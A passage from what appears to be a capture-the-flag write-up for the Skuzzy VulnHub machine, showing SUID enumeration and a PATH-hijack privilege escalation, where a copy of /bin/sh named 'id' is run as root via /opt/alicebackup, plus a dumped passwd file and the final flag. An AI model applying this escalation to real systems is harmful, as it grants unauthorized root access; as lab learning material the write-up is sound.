systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
skuzzy:x:1000:1000:skuzzy skuzbucket,,,:/home/skuzzy:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin

I wander around and find a bunch of files with the SUID bit set, in particular /opt/alicebackup:

www-data@skuzzy:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/sudo
/bin/fusermount
/bin/mount
/bin/su
/bin/ntfs-3g
/bin/ping
/bin/ping6
/bin/umount
/opt/alicebackup

I run the file and I see that the id command is executed, and then an ssh connection is attempted:

www-data@skuzzy:/tmp$ cd /opt/
cd /opt/
www-data@skuzzy:/opt$ ls -la
ls -la
total 20
drwxr-xr-x  2 root root 4096 Mar  2 22:56 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rwsr-xr-x  1 root root 8736 Mar  2 22:56 alicebackup
www-data@skuzzy:/opt$ ./alicebackup
./alicebackup
uid=0(root) gid=0(root) groups=0(root),33(www-data)
ssh: Could not resolve hostname alice.home: Temporary failure in name resolution
lost connection

At this point I copy /bin/sh into /tmp under the name id, prepend /tmp to the PATH environment variable and run /opt/alicebackup, which calls id without an absolute path, so it executes my copy as root and gives me a root shell:

www-data@skuzzy:/opt$ cd /tmp
cd /tmp
www-data@skuzzy:/opt$ clear
clear
TERM environment variable not set.
www-data@skuzzy:/opt$ export TERM=linux
export TERM=linux
www-data@skuzzy:/opt$ ls -la
ls -la
total 20
drwxr-xr-x  2 root root 4096 Mar  2 22:56 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rwsr-xr-x  1 root root 8736 Mar  2 22:56 alicebackup
www-data@skuzzy:/opt$ cd /tmp
cd /tmp
www-data@skuzzy:/tmp$ cp /bin/sh id
cp /bin/sh id
www-data@skuzzy:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@skuzzy:/tmp$ which id
which id
/tmp/id
www-data@skuzzy:/tmp$ /opt/alicebackup
/opt/alicebackup
# whoami
whoami
root
# /usr/bin/id
/usr/bin/id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls -la
ls -la
total 24
drwx------  3 root root 4096 Mar  2 22:36 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
drwx------  2 root root 4096 Mar  2 22:36 .ssh
-rw-r--r--  1 root root  493 Mar  2 22:04 flag.txt
# cat flag.txt
cat flag.txt
Congratulations!

flag5{42273509a79da5bf49f9d40a10c512dd96d89f6a}

You've found the final flag and pwned this CTF VM!

I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last!

I'd love to hear your thoughts on this one.
Too easy?
Too hard?
Too much stuff to install to get the iSCSI initiator working?

Drop me a line on twitter @vortexau, or via email vortex@juicedigital.net

Got root and the last flag!

Learnt some new things here, especially that I do sometimes have the patience for bruteforcing :), and iSCSI (or eye-skuz-ee). I’ve also enjoyed the author’s trolls, very nice!

Thank you to vortex for the VM and Vulnhub for hosting it.